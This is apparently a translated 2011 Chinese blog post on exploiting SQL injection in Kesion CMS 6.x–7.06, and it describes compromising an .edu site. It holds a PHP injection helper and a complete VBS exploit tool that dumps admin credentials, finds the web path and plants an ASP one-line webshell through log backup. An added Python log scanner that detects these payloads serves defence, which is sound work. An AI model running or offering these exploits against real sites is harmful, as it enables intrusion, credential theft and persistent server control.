By: ywisax

    Today I was working over an .edu site together with a certain hacker. Poor webmaster: he had only installed Kesion 6.5 a little while ago, and now the site has been owned outright...

    The experts at t00ls only provided the exploitation method. I dumped the MD5 but couldn't crack it••• It's the MSSQL version of Kesion, and with a bit of luck you can back up a shell, so no giving up. So, following an analysis article from the web, I wrote a bit of PHP; set up php+apache locally, and you can just drop it into a tool and run it.

The following is the quoted snippet:

<?php
/*
// Double URL-encode each byte of the query as %25XX
$str = "' union Select top 10 AdminID,UserName&chr(124)&PassWord From KS_Admin";
$temp = '';
for ($i=0; $i<strlen($str); $i++){
        $temp .= "%25".base_convert(ord($str[$i]),10,16);
}
echo $temp."0";
*/
// http://www.edu.cn/user/reg/regajax.asp?action=getcityoption&province=%2566%2527%2520%256F%2572%2520%2531%253D%2531%2500
// all information
$id = $_GET['id'];
$url = "http://www.edu.cn/user/reg/regajax.asp?action=getcityoption&province=";
$param = "f' or 1=1 and 1=".$id; // ?id=1
$temp = '';
for ($i = 0; $i < strlen($param); $i ++)
{
        $temp .= "%25".base_convert(ord($param[$i]),10,16);
}
$url = $url.$temp."%2500";
//echo $url;
//echo file_get_contents($url);

echo GetSources($url);

function GetSources($Url,$User_Agent='',$Referer_Url='') // fetch a specified page
{
//$Url         address of the page to fetch
//$User_Agent  the user-agent string to send, e.g. "baiduspider" or "googlebot"
$ch = curl_init();
curl_setopt ($ch, CURLOPT_URL, $Url);
curl_setopt ($ch, CURLOPT_USERAGENT, $User_Agent);
curl_setopt ($ch, CURLOPT_REFERER, $Referer_Url);
curl_setopt($ch, CURLOPT_FOLLOWLOCATION,1);
curl_setopt ($ch, CURLOPT_RETURNTRANSFER, 1);
$MySources = curl_exec ($ch);
curl_close($ch);
return $MySources;
}
?>

Kesion 6.x - 7.06 further exploitation (just drop it in a tool and run it) - Script vulnerabilities

    Just modify it yourself as you see fit.

    There is still one problem here: PHP's file_get_contents cannot retrieve the details of a 505 error, so error-based injection isn't possible, only blind injection. I hope an expert can give some pointers•••

    Solved•••

2011-8-6 15:35:04 addendum:

    [Anonymous] contributed a tool: "Here's a tool; in MSSQL error-display mode it can obtain a webshell directly: http://hi.baidu.com/netjacker/blog/item/05f9802c459ee92e359bf715.html"

Kesion 6.x – 7.06 SQL injection vulnerability, VBS exploit tool:

'*=========================================================================
'* Intro   Kesion 6.x – 7.06 SQL injection vulnerability, VBS exploit tool
'* Usage   At the command prompt, enter: Cscript.exe Exp.vbs www.target.com
'* Author  雨中风铃
'* WEB     http://hi.baidu.com/yanfei6
'*=========================================================================

Function PostData(PostUrl)
    Dim Http
    Set Http = CreateObject("msxml2.serverXMLHTTP")
    With Http
        .Open "GET", PostUrl, False
        .Send()
        PostData = .ResponseText
    End With
    Set Http = Nothing
    Wscript.Sleep 2000
End Function

Function BackDB(PostUrl)
    Dim Http
    Set Http = CreateObject("msxml2.serverXMLHTTP")
    With Http
        .Open "GET", PostUrl, False
        .Send()
        WScript.Echo "[ " & .Status & " " & .statusText & " ] " & Unescape(Unescape(PostUrl))
        If .Status<>200 Then
            WScript.Echo "日志差异备份出错!"
            WScript.Quit
        End If
    End With
    Set Http = Nothing
    Wscript.Sleep 2000
End Function

Function IsSuccess(PostUrl, strSign)
    strData = PostData(PostUrl)
    'Wscript.Echo strData
    if InStr(strData, strSign) >0 then
        IsSuccess = True
    Else
        IsSuccess = False
    End If
End Function

Function Encode(strData)
    Dim strTemp, I
    For I = 1 To Len(strData)
        strTemp = strTemp & "%25" & Hex(Asc(Mid(strData, I, 1)))
    Next
    Encode = strTemp & "%2500"
End Function

Function getData(strData, patrn)
    dim strTemp
    Set re = New RegExp
    re.Pattern = patrn
    re.IgnoreCase = True
    re.Global = True
    Set Matches = re.Execute(strData)
    For i = 0 To Matches.Count - 1
        If Matches(i).Value<>"" Then
            strTemp = strTemp & vbCrLf & Matches(i).SubMatches(0)
        End If
    Next
    getData = strTemp
End Function

If WScript.Arguments.Count <> 1 Then
    WScript.Echo "Usage: Cscript.exe Exp.vbs 要检测的网址"
    WScript.Echo "Example: Cscript.exe Exp.vbs http://www.kesion.com/"
    WScript.Quit
End If

attackUrl = WScript.Arguments(0)
attackUrl = Replace(attackUrl,"\","/")
If Right(attackUrl, 1) <> "/" Then
    attackUrl = attackUrl & "/"
End If

strHoleUrl = attackUrl & "user/reg/regajax.asp?action=getcityoption&province="
strTestUrl = strHoleUrl & Encode("' union Select 1, 'ExistHole' From KS_Admin")
If IsSuccess(strTestUrl, "ExistHole") Then
    WScript.Echo "恭喜!存在漏洞"
Else
    WScript.Echo "没有检测到漏洞"
    WScript.Quit
End If

strTestUrl = strHoleUrl & Encode("' union Select 1, 'ExistHole'")
If IsSuccess(strTestUrl, "ExistHole") Then
    WScript.Echo "数据库为:MSSQL"
    bAccess = False
Else
    WScript.Echo "数据库为:ACCESS"
    bAccess = True
End If

strTestUrl = strHoleUrl & Encode("' union Select top 10 AdminID,UserName+'<->'+PassWord From KS_Admin")
WScript.Echo "用户名<->密码:" & getData(PostData(strTestUrl), "value=""([^""]+)")

strTestUrl = strHoleUrl & "%25i"
strWebPath = getData(PostData(strTestUrl), ">([^>]+)\.\./\.\./KS_Cls/Kesion\.EscapeCls\.asp")
strWebPath = Replace(strWebPath, vbCrLf, "")
If strWebPath <> "" Then
    WScript.Echo "网站绝对路径:" & strWebPath
End If

If Not bAccess Then
    strTestUrl = strHoleUrl & Encode("' union Select 1, db_name()")
    strDatabase = getData(PostData(strTestUrl), "value=""([^""]+)")
    strDatabase = Replace(strDatabase, vbCrLf, "")
    WScript.Echo "MSSQL数据库名为:" & strDatabase
End If

WScript.Echo "正在进行数据库差异备份:"
If strWebPath <> "" And strDatabase <> "" Then
    BackDB(strHoleUrl & Encode("';alter database " & strDatabase & " set RECOVERY FULL"))
    BackDB(strHoleUrl & Encode("';create table cmd (a image)"))
    BackDB(strHoleUrl & Encode("';backup log " & strDatabase & " to disk = 'c:\cmd' with init"))
    BackDB(strHoleUrl & Encode("';insert into cmd (a) values (0x3C25657865637574652872657175657374282261222929253E)"))
    BackDB(strHoleUrl & Encode("';backup log " & strDatabase & " to disk = '" & strWebPath & "2.asp'"))
    BackDB(strHoleUrl & Encode("';drop table cmd"))
    BackDB(strHoleUrl & Encode("';alter database "& strDatabase & " set RECOVERY SIMPLE"))
End If
WScript.Echo "Execute一句话木马地址为:" & attackUrl & "user/reg/2.asp"
WScript.Echo "密码为:a"
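Both the PHP snippet and the VBS tool above rely on the same trick: every byte of the payload is sent as %25XX so that the handler, which decodes the query string a second time, sees the raw quote and the %2500 becomes a NUL that cuts off the rest of the statement. From the defender's side the useful move is to decode the logged request the same way and look for what comes out. The following Python is an added example for this page, not code from the original post or from Kesion: it double-decodes the `province` parameter in constructed IIS W3C-style log lines and flags the NUL terminator, the `or 1=1` tautology and the SQL keywords used by the tool's extraction and log-backup steps. The log lines, the field layout and the database name `kesion` are all constructed for the example.

```python
"""Detect double-URL-encoded SQL injection against the Kesion 'province' parameter
in IIS W3C log lines. Added example for this page; not code from the original
post or from Kesion. The log lines and the database name 'kesion' are constructed."""

import re
from urllib.parse import unquote

# Constructed IIS W3C-style lines: date time cs-method cs-uri-stem cs-uri-query sc-status.
# Lines 2-4 carry payloads in the %25XX...%2500 form the post's Encode() routine produces.
SAMPLE_LOG = """\
2011-08-06 15:30:01 GET /user/reg/regajax.asp action=getcityoption&province=10 200
2011-08-06 15:30:02 GET /user/reg/regajax.asp action=getcityoption&province=%2566%2527%2520%256F%2572%2520%2531%253D%2531%2500 200
2011-08-06 15:30:03 GET /user/reg/regajax.asp action=getcityoption&province=%2527%2520union%2520Select%25201%252C%2527ExistHole%2527%2520From%2520KS_Admin%2500 200
2011-08-06 15:30:04 GET /user/reg/regajax.asp action=getcityoption&province=%2527%253Bbackup%2520log%2520kesion%2520to%2520disk%2520%253D%2520%2527c%253A%255Ccmd%2527%2500 500
2011-08-06 15:30:05 GET /index.asp - 200
"""

LOG_RE = re.compile(
    r"^(?P<date>\S+) (?P<time>\S+) (?P<method>\S+) (?P<stem>\S+) (?P<query>\S+) (?P<status>\d{3})$"
)

# Keywords seen in the post's payloads: data extraction, database-name probing,
# the log-backup chain, plus the 'or 1=1' tautology.
SQLI_RE = re.compile(
    r"(?i)("
    r"union\s+select|select\s+.+?\s+from|backup\s+log|alter\s+database|"
    r"drop\s+table|insert\s+into|db_name\s*\(|\b(?:or|and)\s+\d+\s*=\s*\d+"
    r")"
)
# What a legitimate province value is assumed to look like (an id or a short token).
SAFE_VALUE_RE = re.compile(r"^[A-Za-z0-9_-]*$")


def double_decode(raw_value):
    """Decode twice, which is what a handler that unescapes an already-decoded
    query string effectively does: %2566 -> %66 -> 'f', %2500 -> %00 -> NUL."""
    return unquote(unquote(raw_value))


def decode_param(raw_query, name):
    """Return the twice-decoded value of one query parameter, or None if absent."""
    for pair in raw_query.split("&"):
        key, _, raw_value = pair.partition("=")
        if key == name:
            return double_decode(raw_value)
    return None


def analyse_query(raw_query):
    """Inspect one cs-uri-query field and return the indicators found."""
    findings = {"double_encoded": False, "null_byte": False,
                "sql_keywords": [], "suspicious_params": []}
    if raw_query == "-":          # IIS writes '-' when there is no query string
        return findings
    for pair in raw_query.split("&"):
        key, _, raw_value = pair.partition("=")
        decoded = double_decode(raw_value)
        if "%25" in raw_value:    # a literal '%' was itself percent-encoded
            findings["double_encoded"] = True
        if "\x00" in decoded:     # NUL terminator used to cut off the rest of the query
            findings["null_byte"] = True
        match = SQLI_RE.search(decoded)
        if match:
            findings["sql_keywords"].append(re.sub(r"\s+", " ", match.group(1)).lower())
        if key == "province" and not SAFE_VALUE_RE.match(decoded):
            findings["suspicious_params"].append(key)
    return findings


def scan_log(log_text):
    """Return one record per log line that carries an injection indicator."""
    hits = []
    for line_no, line in enumerate(log_text.splitlines(), start=1):
        m = LOG_RE.match(line)
        if not m:
            continue              # header or malformed line
        f = analyse_query(m.group("query"))
        if f["null_byte"] or f["sql_keywords"] or f["suspicious_params"]:
            hits.append({"line": line_no, "stem": m.group("stem"),
                         "status": int(m.group("status")), **f})
    return hits


if __name__ == "__main__":
    for hit in scan_log(SAMPLE_LOG):
        print(hit)
```

Run as a script it prints the three flagged records (lines 2 to 4 of the sample); the plain `province=10` request and the request without a query string are left alone. Against a real log, check the field order against the `#Fields:` header first, then alert on any request to `regajax.asp` whose decoded `province` contains a NUL or one of the keywords; the 500 on the `backup log` line is what the tool's error-based step looks like from the server side, and the `%25`-only indicator is kept separate because on its own it is not proof of an attack.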

Comments (old system):

[Anonymous] @ 2011-08-06 15:30:48

Here's a tool; in MSSQL error-display mode you can obtain a webshell directly: http://hi.baidu.com/netjacker/blog/item/05f9802c459ee92e359bf715.html Also, a note: this site's CAPTCHA is useless in practice; with a regex match it's easy to get the correct answer from the answers page.

Site reply:

The CAPTCHA is mainly there to stop some automatic comment-posting software. Because the answers are a bit twisted, I made an answers page. As for it being "useless", I could perfectly well remove the answers page, but if I removed it for you, I'd like to see where you'd go to find the answers. As for CAPTCHAs, a bit of interest is enough; if I made it too twisted, how would anyone reply?